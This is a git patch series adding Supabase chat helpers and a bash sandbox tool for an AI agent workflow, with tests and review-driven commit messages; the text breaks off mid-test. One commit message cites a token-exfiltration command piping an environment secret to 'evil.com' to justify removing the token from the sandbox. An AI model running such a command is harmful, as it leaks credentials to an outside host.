diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts
new file mode 100644
index 000000000..ff2ceae24
--- /dev/null
+++ b/lib/supabase/chat_messages/selectChatMessages.ts
@@ -0,0 +1,40 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables } from "@/types/database.types";
+
+export type SelectChatMessagesFilter = {
+  id?: string;
+  chatId?: string;
+  /** Order by `created_at` direction. Defaults to ascending (oldest first). */
+  orderBy?: { createdAt: "asc" | "desc" };
+  /** Maximum rows to return. Omit for no limit. */
+  limit?: number;
+};
+
+/**
+ * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions`
+ * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase
+ * error so callers can distinguish "nothing here" from "DB unreachable".
+ *
+ * Domain-specific questions ("is this the first message in the chat?") live
+ * in wrapper helpers under `lib/chat/` — keep this file focused on the
+ * read primitive.
+ */
+export async function selectChatMessages(
+  filter: SelectChatMessagesFilter = {},
+): Promise<Tables<"chat_messages">[] | null> {
+  let query = supabase.from("chat_messages").select("*");
+  if (filter.id) query = query.eq("id", filter.id);
+  if (filter.chatId) query = query.eq("chat_id", filter.chatId);
+  if (filter.orderBy) {
+    query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" });
+    query = query.order("id", { ascending: true });
+  }
+  if (filter.limit !== undefined) query = query.limit(filter.limit);
+
+  const { data, error } = await query;
+  if (error) {
+    console.error("[selectChatMessages] error:", error);
+    return null;
+  }
+  return data ?? [];
+}
diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts
new file mode 100644
index 000000000..d98b9b343
--- /dev/null
+++ b/lib/supabase/chat_messages/upsertChatMessage.ts
@@ -0,0 +1,37 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesInsert } from "@/types/database.types";
+
+/**
+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the
+ *     existing `id` conflict was silently ignored.
+ *   - `{ ok: false, error }` — Supabase failure. Visible to logs so transient
+ *     DB problems aren't masked as duplicates.
+ */
+export type UpsertChatMessageResult =
+  | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Insert-or-skip a single chat message row. Wraps Supabase upsert with
+ * `ignoreDuplicates: true` on the `id` primary key, but returns a
+ * discriminated result so callers can tell "duplicate skipped" apart from
+ * "DB error" — the previous helper returned `null` for both, which made
+ * callers silently swallow operational failures.
+ */
+export async function upsertChatMessage(
+  data: TablesInsert<"chat_messages">,
+): Promise<UpsertChatMessageResult> {
+  const { data: row, error } = await supabase
+    .from("chat_messages")
+    .upsert(data, { onConflict: "id", ignoreDuplicates: true })
+    .select()
+    .maybeSingle();
+
+  if (error) {
+    console.error("[upsertChatMessage] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return { ok: true, row, isDuplicate: row === null };
+}
diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts
new file mode 100644
index 000000000..a0edc247b
--- /dev/null
+++ b/lib/supabase/chats/__tests__/updateChat.test.ts
@@ -0,0 +1,110 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+const updateChain = vi.fn();
+const eqChain = vi.fn();
+const matchChain = vi.fn();
+const isChain = vi.fn();
+const selectChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ update: updateChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Fluent builder mock — every method returns the same builder so we can
+  // chain .eq / .match / .is / .select in any order without per-step setup.
+  const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain };
+  updateChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  matchChain.mockReturnValue(builder);
+  isChain.mockReturnValue(builder);
+});
+
+describe("updateChat", () => {
+  describe("plain update (no where predicate)", () => {
+    it("returns ok:true with rowsUpdated and the row on success", async () => {
+      const row = { id: "chat-1", title: "renamed" };
+      selectChain.mockResolvedValue({ data: [row], error: null });
+      const result = await updateChat({ id: "chat-1" }, { title: "renamed" });
+      expect(result.ok).toBe(true);
+      if (!result.ok) return;
+      expect(result.rowsUpdated).toBe(1);
+      expect(result.row).toEqual(row);
+      expect(updateChain).toHaveBeenCalledWith({ title: "renamed" });
+      expect(eqChain).toHaveBeenCalledWith("id", "chat-1");
+      // With no where filter, match is called with an empty object.
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("returns ok:false with error on Supabase failure", async () => {
+      selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+      const result = await updateChat({ id: "chat-x" }, { title: "x" });
+      expect(result.ok).toBe(false);
+      if (result.ok) return;
+      expect(result.error).toBe("down");
+    });
+  });
+
+  describe("generic where predicate", () => {
+    it("emits `is null` for null values (e.g. CAS expecting unset)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      // No non-null fields → match called with empty {}
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: "wrun_old" } },
+        { active_stream_id: "wrun_new" },
+      );
+      expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" });
+      // No null fields → is() not called
+      expect(isChain).not.toHaveBeenCalled();
+    });
+
+    it("AND-s nullable + equality where columns together", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } },
+        { title: "x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" });
+    });
+
+    it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => {
+      selectChain.mockResolvedValue({ data: [], error: null });
+      const result = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+    });
+
+    it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => {
+      selectChain.mockResolvedValueOnce({ data: [], error: null });
+      const raceLost = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+
+      selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } });
+      const dbError = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" }));
+    });
+  });
+});
diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts
new file mode 100644
index 000000000..63cd2064b
--- /dev/null
+++ b/lib/supabase/chats/updateChat.ts
@@ -0,0 +1,86 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesUpdate } from "@/types/database.types";
+
+/**
+ * Subset of `chats` columns that callers are permitted to mutate via this
+ * helper. Explicitly excludes structural fields (`id`, `session_id`,
+ * `created_at`) so generic updates cannot bypass chat invariants.
+ */
+export type ChatMutableFields = Pick<
+  TablesUpdate<"chats">,
+  "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at"
+>;
+
+/**
+ * Filter accepted by {@link updateChat}. Always matches by `id`. Optional
+ * `where` adds AND-ed predicates per column — generic across columns so
+ * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their
+ * own wrapper helpers rather than baking into the Supabase plumbing.
+ *
+ * Each `where` entry maps to `column = value` (or `column IS NULL` when
+ * `value === null`).
+ */
+export type UpdateChatFilter = {
+  id: string;
+  where?: Partial<Tables<"chats">>;
+};
+
+/**
+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, rowsUpdated: 1 }` — updated as intended.
+ *   - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS
+ *     race lost, or `id` not found).
+ *   - `{ ok: false, error }` — Supabase / network failure.
+ */
+export type UpdateChatResult =
+  | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null }
+  | { ok: false; error: string };
+
+/**
+ * Updates a `chats` row by id, optionally constrained by a generic `where`
+ * predicate. Returns a discriminated result so callers can tell
+ * "predicate didn't match" (a race lost) from "Supabase failure" (operational
+ * issue) — the previous behavior of returning `false` for both was a CAS bug.
+ */
+export async function updateChat(
+  filter: UpdateChatFilter,
+  updates: ChatMutableFields,
+): Promise<UpdateChatResult> {
+  // Split the optional `where` map into nullable vs equality predicates so we
+  // can apply each as a single chained call (`.match()` for equalities,
+  // `.is(col, null)` per nullable). Iterating with `let query = ...` and
+  // reassigning in a for-loop confuses Supabase's deeply generic builder
+  // types ("type instantiation is excessively deep") in the Next.js build.
+  const entries = Object.entries(filter.where ?? {});
+  const equalityMatches: Record<string, unknown> = {};
+  const nullColumns: string[] = [];
+  for (const [column, value] of entries) {
+    if (value === null) {
+      nullColumns.push(column);
+    } else {
+      equalityMatches[column] = value;
+    }
+  }
+
+  const baseQuery = supabase
+    .from("chats")
+    .update(updates)
+    .eq("id", filter.id)
+    .match(equalityMatches);
+  const finalQuery = nullColumns.reduce<typeof baseQuery>(
+    (q, column) => q.is(column, null) as typeof baseQuery,
+    baseQuery,
+  );
+
+  const { data, error } = await finalQuery.select();
+  if (error) {
+    console.error("[updateChat] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return {
+    ok: true,
+    rowsUpdated: data?.length ?? 0,
+    row: data?.[0] ?? null,
+  };
+}

From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:12:07 -0500
Subject: [PATCH 3/5] feat(chat-workflow): port bash sandbox tool + wire
 experimental_context (PR 4, slim) (#583)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  34 ++--
 app/lib/workflows/runAgentWorkflow.ts         |  32 ++--
 lib/agent/__tests__/buildAgentTools.test.ts   |  17 ++
 lib/agent/buildAgentTools.ts                  |  20 +++
 lib/agent/tools/AgentContext.ts               |  34 ++++
 lib/agent/tools/__tests__/bashTool.test.ts    | 158 ++++++++++++++++++
 .../__tests__/buildRecoupExecEnv.test.ts      |  31 ++++
 lib/agent/tools/__tests__/getSandbox.test.ts  |  39 +++++
 .../tools/__tests__/isAgentContext.test.ts    |  42 +++++
 lib/agent/tools/bashTool.ts                   | 116 +++++++++++++
 lib/agent/tools/buildRecoupExecEnv.ts         |  30 ++++
 lib/agent/tools/getSandbox.ts                 |  28 ++++
 lib/agent/tools/isAgentContext.ts             |  26 +++
 lib/agents/generalAgent/getGeneralAgent.ts    |   5 +-
 lib/chat/const.ts                             |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  20 +++
 16 files changed, 615 insertions(+), 30 deletions(-)
 create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts
 create mode 100644 lib/agent/buildAgentTools.ts
 create mode 100644 lib/agent/tools/AgentContext.ts
 create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
 create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts
 create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts
 create mode 100644 lib/agent/tools/bashTool.ts
 create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts
 create mode 100644 lib/agent/tools/getSandbox.ts
 create mode 100644 lib/agent/tools/isAgentContext.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 352dcd265..f9a894195 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,27 +1,36 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so each tool's
+   * `execute` callback can read the sandbox state + per-prompt context.
+   */
+  agentContext: AgentContext;
 };
 
 /**
- * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
- * `"use step"` so that:
+ * One LLM turn (with internal tool-call iteration) in the chat workflow.
+ * Runs as a Vercel Workflow `"use step"` so:
  *
  *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
  *   - The result is cached as a single durable event — replays after a crash
- *     do not re-bill the model.
+ *     do not re-bill the model or re-execute tools.
  *
- * Currently emits a plain text response with no tools. Sandbox tools land in
- * the follow-up PR (port `@open-harness/agent` tools + wire via
- * `experimental_context`).
+ * `streamText` drives the tool-call → tool-result → next-LLM-call loop
+ * internally, bounded by `CHAT_AGENT_STOP_WHEN`. Our outer workflow stays
+ * single-turn for now — multi-turn message threading lands when the rest
+ * of the tool surface ports in a follow-up PR.
  *
- * @param input - Messages + selected model + the workflow's writable stream.
- * @returns finishReason from the model run (for the workflow loop's break condition).
+ * @param input - Messages + selected model + writable stream + agent context.
+ * @returns finishReason from the model run.
  */
 export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
   "use step";
@@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   console.log("[runAgentStep] start", {
     modelId: input.modelId,
     messageCount: input.messages.length,
+    hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
   const modelMessages = convertToModelMessages(input.messages);
+  const tools = buildAgentTools();
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
     messages: modelMessages,
+    tools,
+    stopWhen: CHAT_AGENT_STOP_WHEN,
+    experimental_context: input.agentContext,
   });
 
-  // Acquire the writer once and release in `finally` — re-acquiring per chunk
-  // (the previous shape) leaked the lock when any write threw.
+  // Acquire the writer once and release in `finally` so a thrown chunk
+  // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
     for await (const part of result.toUIMessageStream()) {
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index db679145a..ce65b0bb3 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,12 +1,18 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
   chatId: string;
   sessionId: string;
   modelId: string;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
+   * can read sandbox state + the optional Recoup org id.
+   */
+  agentContext: AgentContext;
 };
 
 /**
@@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = {
  * client; this function writes UIMessage chunks into the workflow's writable
  * via `runAgentStep`.
  *
- * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
- * unsafe today: each iteration would re-send the original prompt without
- * the assistant's tool-call response in scope, so a `tool-calls` finish
- * reason would loop forever on the same input. The proper multi-turn
- * shape (where the step appends its response to `messages` before the
- * next iteration) lands with the sandbox-tool port in PR 4.
- *
- * Until then, if the model returns `tool-calls` we log a warning and exit
- * — the client receives the partial tool-call chunks but no follow-up turn.
+ * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (bounded
+ * by `CHAT_AGENT_STOP_WHEN`) happens INSIDE `streamText` via `stopWhen` — so
+ * the single workflow turn covers the full "user → assistant → tool → tool
+ * result → assistant" cycle without an outer loop having to thread
+ * messages between iterations.
  *
  * WDK constraints honored:
- *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions.
  *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
  */
 export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
@@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<vo
     messages: input.messages,
     modelId: input.modelId,
     writable,
+    agentContext: input.agentContext,
   });
 
-  if (result.finishReason === "tool-calls") {
-    console.warn(
-      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
-      { chatId: input.chatId },
-    );
-  } else {
-    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
-  }
+  console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
 }
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
new file mode 100644
index 000000000..52479cad0
--- /dev/null
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -0,0 +1,17 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+
+describe("buildAgentTools", () => {
+  it("returns a tools record keyed by tool name", () => {
+    const tools = buildAgentTools();
+    expect(tools).toHaveProperty("bash");
+    expect(typeof tools.bash).toBe("object");
+  });
+
+  it("each tool has an inputSchema, description, and execute", () => {
+    const tools = buildAgentTools();
+    expect(tools.bash.inputSchema).toBeDefined();
+    expect(tools.bash.description).toBeDefined();
+    expect(typeof tools.bash.execute).toBe("function");
+  });
+});
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
new file mode 100644
index 000000000..be6bde085
--- /dev/null
+++ b/lib/agent/buildAgentTools.ts
@@ -0,0 +1,20 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+
+/**
+ * Factory for the full agent tool set passed into `streamText({ tools })`.
+ * Each tool reads its sandbox state + Recoup org id from `experimental_context`
+ * at execute time — the factory takes no arguments because the tools are
+ * stateless modulo that context.
+ *
+ * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
+ * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
+ * `fetch`) port in follow-up PRs and slot into this record one-by-one
+ * without changing the factory signature.
+ */
+export function buildAgentTools() {
+  return {
+    bash: bashTool(),
+  };
+}
+
+export type AgentTools = ReturnType<typeof buildAgentTools>;
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
new file mode 100644
index 000000000..63d2a1b7e
--- /dev/null
+++ b/lib/agent/tools/AgentContext.ts
@@ -0,0 +1,34 @@
+import type { VercelState } from "@/lib/sandbox/vercel/state";
+
+/**
+ * Per-tool-call context threaded into the agent via `streamText`'s
+ * `experimental_context`. Mirrors the open-agents `AgentContext` shape
+ * (subset — slim PR 4 ports only the `bash` tool, so context only needs
+ * what `bash` reads).
+ *
+ * Why no `recoupAccessToken` field? A short-lived per-prompt credential
+ * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
+ * back to recoup-api as the caller. We deliberately omit it here — the
+ * legacy api-key path is too long-lived to expose inside a sandbox where
+ * model-issued bash commands can read env. Proper short-lived token
+ * minting lands alongside the `skill` tool port.
+ */
+export type AgentContext = {
+  /**
+   * Persistable sandbox state. Tools reconnect via `connectVercel(state)` —
+   * we never pass a live `Sandbox` instance through context because
+   * workflow durability requires replay-friendly inputs.
+   */
+  sandbox: {
+    state: VercelState;
+    workingDirectory: string;
+    currentBranch?: string;
+  };
+  /**
+   * Organization UUID when the sandbox was opened against a recoupable
+   * org repo (`org-<slug>-<uuid>`). Forwarded to sandboxed commands as
+   * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org.
+   * Public information — no security risk in exposing.
+   */
+  recoupOrgId?: string;
+};
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
new file mode 100644
index 000000000..da9a999d3
--- /dev/null
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseContext = {
+  sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(overrides: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    exec: vi.fn(),
+    execDetached: vi.fn(),
+    ...overrides,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("bashTool.execute", () => {
+  it("executes a command via sandbox.exec in the sandbox's working directory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "README.md\npackage.json",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = await tool.execute!({ command: "ls" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(result).toEqual({
+      success: true,
+      exitCode: 0,
+      stdout: "README.md\npackage.json",
+      stderr: "",
+    });
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "lots of output",
+        stderr: "",
+        truncated: true,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "find ." }, {
+      experimental_context: baseContext,
+    } as never)) as { truncated?: boolean };
+    expect(result.truncated).toBe(true);
+  });
+
+  it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "ls", cwd: "apps/web" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono/apps/web",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("injects RECOUP_ORG_ID into the exec env when present in context", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "curl example.com" }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record<string, string> };
+    expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("returns the detached commandId when called with detached:true", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stdout: string };
+    expect(result.success).toBe(true);
+    expect(result.stdout).toMatch(/cmd-123/);
+    expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono");
+  });
+
+  it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => {
+    const sandbox = makeSandbox({ execDetached: undefined });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stderr: string };
+    expect(result.success).toBe(false);
+    expect(result.stderr).toMatch(/detached mode is not supported/i);
+  });
+
+  it("does NOT inject env vars on detached execs", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    // execDetached signature is (command, cwd) — no env arg.
